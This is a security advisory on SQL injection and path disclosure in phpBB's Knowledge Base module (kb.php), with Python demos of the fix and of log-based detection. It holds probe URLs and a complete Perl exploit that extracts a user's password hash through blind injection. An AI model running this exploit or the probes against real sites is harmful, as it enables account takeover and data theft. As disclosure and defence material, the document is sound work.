
phpBB Knowledge Base Module SQL Injection and Full Path Disclosure Vulnerability

Date: 2005-7-5 16:55:06    Author: anonymous   Hits:    Source: unknown

Affected systems:

phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0

Description:

phpBB is a widely used open-source web forum application written in PHP. It supports several databases as its backend, such as Oracle, MSSQL, MySQL, PostgreSQL and others.

The Knowledge Base module of phpBB contains a SQL injection vulnerability; a remote attacker could exploit it to perform unauthorized operations on the database.

The cause is that the application does not properly filter user input before using it in a SQL query. If a user is able to supply the following input:

/kb.php?mode=cat&cat='

an error message similar to the following is returned:

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error

Successful exploitation of this vulnerability could lead to compromise of the application and disclosure or modification of data.
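As an added illustration that is not part of the original advisory, the following Python model reproduces the three outcomes described above against an in-memory SQLite database: a syntax error for the bare quote, an empty result for the UNION with WHERE 1=0, and a row for the unrestricted UNION. The table layout, the column names and the sample hash value are constructed for the demo and are not phpBB's real schema, and the function names are this example's own. The hardened variant shows the fix: accept only an integer and bind it as a parameter (on the PHP side, intval() on the parameter or a prepared statement).

```python
import re
import sqlite3

# Constructed in-memory schema that mimics the two tables named in the advisory.
# Column counts matter: the UNION probes in the advisory select six values, so the
# categories table here has six (constructed) columns.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE phpbb_kb_categories (category_id INTEGER, parent_id INTEGER, "
        "category_name TEXT, category_details TEXT, category_order INTEGER, article_count INTEGER)"
    )
    conn.execute("CREATE TABLE phpbb_users (user_id INTEGER, username TEXT, user_password TEXT)")
    conn.executemany(
        "INSERT INTO phpbb_kb_categories VALUES (?,?,?,?,?,?)",
        [(1, 0, "General", "", 1, 0), (2, 0, "Howto", "", 2, 0)],
    )
    # Constructed placeholder hash value, not a real credential.
    conn.execute("INSERT INTO phpbb_users VALUES (2, 'admin', '00000000000000000000000000000000')")
    conn.commit()
    return conn


def category_page_vulnerable(conn, cat):
    """Builds the query the way the advisory's error message shows it: the raw
    parameter is concatenated into the SQL text. Returns the three outcomes an
    observer can distinguish: 'error' (the DEBUG MODE page), 'no match'
    (empty result) and 'match' (at least one row came back)."""
    sql = "SELECT * FROM phpbb_kb_categories WHERE category_id = " + cat
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"
    return "match" if rows else "no match"


def category_page_hardened(conn, cat):
    """Same lookup with an integer allow-list check and a bound parameter.
    Anything that is not a short run of digits is rejected before any SQL runs."""
    if not re.fullmatch(r"[0-9]{1,10}", cat):
        return "rejected"
    rows = conn.execute(
        "SELECT * FROM phpbb_kb_categories WHERE category_id = ?", (int(cat),)
    ).fetchall()
    return "match" if rows else "no match"


# The three probes from the advisory, URL-decoded ('+' is a space in a query string).
PROBES = {
    "quote": "'",
    "union_false": "0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users WHERE 1=0",
    "union_true": "0 UNION SELECT 0,0,0,0,0,0 FROM phpbb_users",
}


def run_probes(handler):
    """Run every probe through one handler and report the observable outcome."""
    conn = build_demo_db()
    return {name: handler(conn, probe) for name, probe in PROBES.items()}


if __name__ == "__main__":
    print("vulnerable:", run_probes(category_page_vulnerable))
    print("hardened:  ", run_probes(category_page_hardened))
```

The real application reported the "match" case as a DEBUG MODE error because it choked on the foreign row, but the point is the same: the response differs between a true and a false condition, so the parameter must never reach the query unvalidated. Independently of the query fix, the debug output that echoes the query text and the full file path (the "Line" and "File" lines above) should not be enabled on a production site.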
Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#                                    
# Discovered by [R] and deluxe89        
# Exploit by deluxe89      
#########################
\n";

if($#ARGV < 2)
{
        print "Usage: ./phpbb_kb.pl host path userid [proxy:port]\n";
        print "Example: ./phpbb_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
        exit;
}


my $debug = 0;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';


my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
        print "[+] Using a proxy\n";
}
else
{
        print "[+] You're using NO proxy!\n";
        sleep(3);
}



#
# Get the table prefix
#

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

while(<$sock>)
{
        if($_ =~ m/FROM (\w+)kb_categories/)
        {
                $prefix = $1;
                print "[+] Table prefix: $prefix\n";
                last;
        }
}
if($prefix eq '')
{
        die("[-] Getting the table prefix failed.\n");
}




#
# Getting the hash
#

print "[+] Getting the hash. Please wait some minutes..\nHash: ";


my $hash = '';
# The phpBB 2 password hash is a 32-character hex MD5, so walk positions 1..32.
for(my $i=1;$i<33;$i++)
{
        if(&test($i, 96)) # ASCII code above 96: a letter (a-f)
        {
                for(my $c=97;$c<103;$c++)
                {
                        if(&test($i, $c, 1))
                        {
                                $hash .= pack('c', $c);
                                print pack('c', $c);
                                last;
                        }
                }
        }
        else # otherwise a digit (0-9)
        {
                for(my $c=48;$c<58;$c++)
                {
                        if(&test($i, $c, 1))
                        {
                                $hash .= pack('c', $c);
                                print pack('c', $c);
                                last;
                        }
                }
        }
}
print "\n";
print "\n";


# Returns 1 when the injected condition is true (the server answers with the
# DEBUG MODE error page) and 0 otherwise. $g selects '=' (exact match) instead of '>'.
sub test
{
        my ($i, $num, $g) = @_;

        my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
        my $value = "mode=cat&cat=0+union+select+0,1,3,3,7,0+from+${prefix}users+where+user_id=$userid+and+ascii(substring(user_password,$i,1))";
        $value .= ($g) ? '=' : '>';
        $value .= "$num/*";

        if($debug)
        {
                print "\t$value\n";
        }

        print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

        while(<$sock>)
        {
                if($_ =~ m/DEBUG MODE/)
                {
                        return 1;
                }
        }
        return 0;
}
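On the defender's side, the requests the advisory and the script above produce are easy to spot in a web server log: kb.php is called with a cat parameter that is not a plain integer, first with a quote, then with UNION SELECT, then with a long run of ascii(substring(user_password,N,1)) comparisons walking N from 1 to 32. The following Python scanner is an added example, not part of the advisory, that labels those three patterns in Apache combined-format access log lines and summarizes them per source address. The log lines are constructed for the example (RFC 5737 documentation addresses) and the helper names are this example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines modelled on the requests the advisory
# describes; this is not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jul/2005:16:55:06 +0000] "GET /phpBB2/kb.php?mode=cat&cat=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
192.0.2.10 - - [05/Jul/2005:16:55:09 +0000] "GET /phpBB2/kb.php?mode=cat&cat=3 HTTP/1.1" 200 4870 "-" "Mozilla/4.0"
198.51.100.7 - - [05/Jul/2005:16:57:01 +0000] "GET /phpBB2/kb.php?mode=cat&cat=%27 HTTP/1.1" 200 2210 "-" "-"
198.51.100.7 - - [05/Jul/2005:16:57:02 +0000] "GET /phpBB2/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0 HTTP/1.1" 200 1980 "-" "-"
198.51.100.7 - - [05/Jul/2005:16:57:03 +0000] "GET /phpBB2/kb.php?mode=cat&cat=0+union+select+0,1,3,3,7,0+from+phpbb_users+where+user_id=2+and+ascii(substring(user_password,1,1))>96/* HTTP/1.1" 200 2210 "-" "-"
198.51.100.7 - - [05/Jul/2005:16:57:03 +0000] "GET /phpBB2/kb.php?mode=cat&cat=0+union+select+0,1,3,3,7,0+from+phpbb_users+where+user_id=2+and+ascii(substring(user_password,1,1))=97/* HTTP/1.1" 200 1980 "-" "-"
192.0.2.10 - - [05/Jul/2005:16:58:40 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 9001 "-" "Mozilla/4.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target protocol", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

QUOTE_RE = re.compile(r"['\"]")
UNION_RE = re.compile(r"\bunion\s+select\b", re.IGNORECASE)
# Captures the column and the character position of a blind-extraction probe.
BLIND_RE = re.compile(
    r"ascii\s*\(\s*substring\s*\(\s*(?P<col>\w+)\s*,\s*(?P<pos>\d+)", re.IGNORECASE
)


def classify_cat(value):
    """Return None for a well-formed (all-digit) cat value, otherwise a label
    for the kind of tampering seen, from most to least specific."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    if BLIND_RE.search(value):
        return "blind-extraction"
    if UNION_RE.search(value):
        return "union-probe"
    if QUOTE_RE.search(value):
        return "quote-probe"
    return "non-numeric"


def scan_log(text):
    """One finding per kb.php request whose cat parameter is not a plain integer:
    (ip, timestamp, label, decoded cat value, probed substring position or None)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/kb.php"):
            continue
        # parse_qs percent-decodes the value and turns '+' into spaces.
        for cat in parse_qs(parts.query).get("cat", []):
            label = classify_cat(cat)
            if label is None:
                continue
            b = BLIND_RE.search(cat)
            pos = int(b.group("pos")) if b else None
            findings.append((m.group("ip"), m.group("ts"), label, cat, pos))
    return findings


def summarize(findings):
    """Per source address: how many requests of each label, and which hash
    positions a blind-extraction loop has walked so far (a growing list of
    consecutive positions from one address is the signature of the script)."""
    counts = defaultdict(Counter)
    positions = defaultdict(set)
    for ip, _ts, label, _cat, pos in findings:
        counts[ip][label] += 1
        if pos is not None:
            positions[ip].add(pos)
    return {ip: {"counts": dict(c), "positions": sorted(positions[ip])} for ip, c in counts.items()}


if __name__ == "__main__":
    for ip, info in summarize(scan_log(SAMPLE_LOG)).items():
        print(ip, info)
```

In practice the same classifier can be pointed at the live access log and paired with a threshold: a single source issuing more than a handful of non-numeric cat requests, or walking more than a few substring positions, is worth an alert and a block, and every such hit is also a reminder that the kb.php query itself needs the integer validation described in the advisory.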

